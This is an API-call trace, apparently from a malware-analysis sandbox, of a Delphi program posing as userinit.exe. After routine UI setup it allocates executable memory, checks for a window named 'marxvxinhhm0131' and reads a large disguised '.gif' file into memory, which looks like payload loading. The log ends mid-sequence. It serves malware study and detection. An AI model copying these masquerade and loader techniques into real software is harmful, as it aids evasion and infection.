[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0187.813] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0187.814] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0187.814] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0187.814] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0187.814] GetVersion () returned 0x1db10106
[0187.814] GetCurrentProcessId () returned 0x2a8
[0187.814] GlobalAddAtomA (lpString="Delphi000002A8") returned 0xc0fb
[0187.814] GetCurrentThreadId () returned 0x5a8
[0187.814] GlobalAddAtomA (lpString="ControlOfs00400000000005A8") returned 0xc0fa
[0187.815] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000005A8") returned 0xc186
[0187.815] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0187.815] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0187.815] GetSystemMetrics (nIndex=19) returned 1
[0187.821] GetSystemMetrics (nIndex=75) returned 1
[0187.821] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0187.821] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0187.821] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0187.821] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x12022d
[0187.822] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0187.822] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0187.822] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0187.822] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xf0229
[0187.822] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x10021d
[0187.822] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x100219
[0187.822] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x110217
[0187.822] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x100215
[0187.823] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xd020d
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0187.823] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0187.823] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0187.823] GetDC (hWnd=0x0) returned 0x68010872
[0187.823] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0187.823] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0187.823] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0187.823] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0187.823] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x12fa4f, fWinIni=0x0 | out: pvParam=0x12fa4f) returned 1
[0187.823] CreateFontIndirectA (lplf=0x12fa4f) returned 0x320a089a
[0187.824] GetObjectA (in: h=0x320a089a, c=60, pv=0x12f840 | out: pv=0x12f840) returned 60
[0187.824] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x12f8fb, fWinIni=0x0 | out: pvParam=0x12f8fb) returned 1
[0187.824] CreateFontIndirectA (lplf=0x12f9d7) returned 0x2a0a0876
[0187.824] GetObjectA (in: h=0x2a0a0876, c=60, pv=0x12f840 | out: pv=0x12f840) returned 60
[0187.824] CreateFontIndirectA (lplf=0x12f99b) returned 0x2c0a0854
[0187.824] GetObjectA (in: h=0x2c0a0854, c=60, pv=0x12f840 | out: pv=0x12f840) returned 60
[0187.824] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0187.824] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12f9af, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0187.824] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x12f9af | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0187.824] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0187.824] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x12f964 | out: lpWndClass=0x12f964) returned 0
[0187.824] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0187.824] GetSystemMetrics (nIndex=0) returned 1440
[0187.825] GetSystemMetrics (nIndex=1) returned 900
[0187.825] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x1201e8
[0187.835] SetWindowLongA (hWnd=0x1201e8, nIndex=-4, dwNewLong=856047) returned 4219500
[0187.835] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0187.835] SendMessageA (hWnd=0x1201e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0187.835] DefWindowProcA (hWnd=0x1201e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0187.846] DefWindowProcA (hWnd=0x1201e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xe0203
[0187.846] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0187.846] SetClassLongA (hWnd=0x1201e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0187.847] GetSystemMenu (hWnd=0x1201e8, bRevert=0) returned 0xf01f3
[0187.848] DeleteMenu (hMenu=0xf01f3, uPosition=0xf030, uFlags=0x0) returned 1
[0187.848] DeleteMenu (hMenu=0xf01f3, uPosition=0xf000, uFlags=0x0) returned 1
[0187.848] DeleteMenu (hMenu=0xf01f3, uPosition=0xf010, uFlags=0x0) returned 1
[0187.849] GetKeyboardLayoutList (in: nBuff=64, lpList=0x12f930 | out: lpList=0x12f930) returned 1
[0187.849] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0187.850] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0187.850] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0187.850] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0187.851] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0187.851] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0187.851] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0187.851] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0187.851] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0187.851] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0187.851] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0187.851] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0187.851] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0187.851] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0187.851] GetCurrentThreadId () returned 0x5a8
[0187.851] GlobalAddAtomA (lpString="WndProcPtr00400000000005A8") returned 0xc0f9
[0187.851] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0187.852] ShowWindow (hWnd=0x1201e8, nCmdShow=0) returned 0
[0187.852] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0187.852] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0187.852] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f6b0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12f6b0*=0) returned 0x0
[0187.852] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f6a8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12f6a8*=0) returned 0x0
[0187.852] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f6a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12f6a8*=0) returned 0x10be00
[0187.852] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x12f6a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12f6a8*=0) returned 0x0
[0187.853] GlobalLock (hMem=0x680004) returned 0x860020
[0187.853] ReadFile (in: hFile=0x98, lpBuffer=0x860020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x12f6c4, lpOverlapped=0x0 | out: lpBuffer=0x860020*, lpNumberOfBytesRead=0x12f6c4*=0x10be00, lpOverlapped=0x0) returned 1
[0187.887] CloseHandle (hObject=0x98) returned 1
[0187.887] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.887] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.887] GlobalUnlock (hMem=0x68000c) returned 0
[0187.887] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4000, uFlags=0x2) returned 0x68000c
[0187.887] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.888] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.888] GlobalUnlock (hMem=0x68000c) returned 0
[0187.888] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6000, uFlags=0x2) returned 0x68000c
[0187.888] GlobalLock (hMem=0x68000c) returned 0x2ea820
[0187.889] GlobalHandle (pMem=0x2ea820) returned 0x68000c
[0187.889] GlobalUnlock (hMem=0x68000c) returned 0
[0187.889] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8000, uFlags=0x2) returned 0x68000c
[0187.889] GlobalLock (hMem=0x68000c) returned 0x2f0830
[0187.890] GlobalHandle (pMem=0x2f0830) returned 0x68000c
[0187.890] GlobalUnlock (hMem=0x68000c) returned 0
[0187.890] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa000, uFlags=0x2) returned 0x68000c
[0187.890] GlobalLock (hMem=0x68000c) returned 0x2f0830
[0187.890] GlobalHandle (pMem=0x2f0830) returned 0x68000c
[0187.890] GlobalUnlock (hMem=0x68000c) returned 0
[0187.890] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc000, uFlags=0x2) returned 0x68000c
[0187.891] GlobalLock (hMem=0x68000c) returned 0x2fa840
[0187.891] GlobalHandle (pMem=0x2fa840) returned 0x68000c
[0187.891] GlobalUnlock (hMem=0x68000c) returned 0
[0187.891] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe000, uFlags=0x2) returned 0x68000c
[0187.891] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.892] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.892] GlobalUnlock (hMem=0x68000c) returned 0
[0187.892] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10000, uFlags=0x2) returned 0x68000c
[0187.892] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.892] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.892] GlobalUnlock (hMem=0x68000c) returned 0
[0187.892] GlobalReAlloc (hMem=0x68000c, dwBytes=0x12000, uFlags=0x2) returned 0x68000c
[0187.892] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.893] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.893] GlobalUnlock (hMem=0x68000c) returned 0
[0187.893] GlobalReAlloc (hMem=0x68000c, dwBytes=0x14000, uFlags=0x2) returned 0x68000c
[0187.893] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.893] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.893] GlobalUnlock (hMem=0x68000c) returned 0
[0187.893] GlobalReAlloc (hMem=0x68000c, dwBytes=0x16000, uFlags=0x2) returned 0x68000c
[0187.893] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.894] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.894] GlobalUnlock (hMem=0x68000c) returned 0
[0187.894] GlobalReAlloc (hMem=0x68000c, dwBytes=0x18000, uFlags=0x2) returned 0x68000c
[0187.894] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.894] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.894] GlobalUnlock (hMem=0x68000c) returned 0
[0187.894] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1a000, uFlags=0x2) returned 0x68000c
[0187.894] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.895] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.895] GlobalUnlock (hMem=0x68000c) returned 0
[0187.895] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1c000, uFlags=0x2) returned 0x68000c
[0187.895] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.895] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.895] GlobalUnlock (hMem=0x68000c) returned 0
[0187.895] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1e000, uFlags=0x2) returned 0x68000c
[0187.895] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.896] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.896] GlobalUnlock (hMem=0x68000c) returned 0
[0187.896] GlobalReAlloc (hMem=0x68000c, dwBytes=0x20000, uFlags=0x2) returned 0x68000c
[0187.896] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.896] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.897] GlobalUnlock (hMem=0x68000c) returned 0
[0187.897] GlobalReAlloc (hMem=0x68000c, dwBytes=0x22000, uFlags=0x2) returned 0x68000c
[0187.898] GlobalLock (hMem=0x68000c) returned 0x306820
[0187.899] GlobalHandle (pMem=0x306820) returned 0x68000c
[0187.899] GlobalUnlock (hMem=0x68000c) returned 0
[0187.899] GlobalReAlloc (hMem=0x68000c, dwBytes=0x24000, uFlags=0x2) returned 0x68000c
[0187.899] GlobalLock (hMem=0x68000c) returned 0x306820
[0187.899] GlobalHandle (pMem=0x306820) returned 0x68000c
[0187.899] GlobalUnlock (hMem=0x68000c) returned 0
[0187.899] GlobalReAlloc (hMem=0x68000c, dwBytes=0x26000, uFlags=0x2) returned 0x68000c
[0187.901] GlobalLock (hMem=0x68000c) returned 0x32a830
[0187.901] GlobalHandle (pMem=0x32a830) returned 0x68000c
[0187.901] GlobalUnlock (hMem=0x68000c) returned 0
[0187.901] GlobalReAlloc (hMem=0x68000c, dwBytes=0x28000, uFlags=0x2) returned 0x68000c
[0187.901] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.901] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.901] GlobalUnlock (hMem=0x68000c) returned 0
[0187.902] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2a000, uFlags=0x2) returned 0x68000c
[0187.902] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.902] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.902] GlobalUnlock (hMem=0x68000c) returned 0
[0187.902] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2c000, uFlags=0x2) returned 0x68000c
[0187.902] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.902] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.902] GlobalUnlock (hMem=0x68000c) returned 0
[0187.902] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2e000, uFlags=0x2) returned 0x68000c
[0187.903] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.903] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.903] GlobalUnlock (hMem=0x68000c) returned 0
[0187.903] GlobalReAlloc (hMem=0x68000c, dwBytes=0x30000, uFlags=0x2) returned 0x68000c
[0187.903] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.903] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.903] GlobalUnlock (hMem=0x68000c) returned 0
[0187.903] GlobalReAlloc (hMem=0x68000c, dwBytes=0x32000, uFlags=0x2) returned 0x68000c
[0187.904] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.904] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.904] GlobalUnlock (hMem=0x68000c) returned 0
[0187.904] GlobalReAlloc (hMem=0x68000c, dwBytes=0x34000, uFlags=0x2) returned 0x68000c
[0187.904] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.904] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.904] GlobalUnlock (hMem=0x68000c) returned 0
[0187.904] GlobalReAlloc (hMem=0x68000c, dwBytes=0x36000, uFlags=0x2) returned 0x68000c
[0187.904] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.905] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.905] GlobalUnlock (hMem=0x68000c) returned 0
[0187.905] GlobalReAlloc (hMem=0x68000c, dwBytes=0x38000, uFlags=0x2) returned 0x68000c
[0187.905] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.906] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.906] GlobalUnlock (hMem=0x68000c) returned 0
[0187.906] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3a000, uFlags=0x2) returned 0x68000c
[0187.906] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.906] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.906] GlobalUnlock (hMem=0x68000c) returned 0
[0187.906] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3c000, uFlags=0x2) returned 0x68000c
[0187.906] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.907] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.907] GlobalUnlock (hMem=0x68000c) returned 0
[0187.907] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3e000, uFlags=0x2) returned 0x68000c
[0187.907] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.907] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.907] GlobalUnlock (hMem=0x68000c) returned 0
[0187.907] GlobalReAlloc (hMem=0x68000c, dwBytes=0x40000, uFlags=0x2) returned 0x68000c
[0187.907] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.908] GlobalHandle (pMem=0x2e6810) returned 0x68000c
[0187.908] GlobalUnlock (hMem=0x68000c) returned 0
[0187.908] GlobalReAlloc (hMem=0x68000c, dwBytes=0x42000, uFlags=0x2) returned 0x68000c
[0187.908] GlobalLock (hMem=0x68000c) returned 0x2e6810
[0187.908] GlobalHandle (pMem=0x2e6810) returned 0x68000c
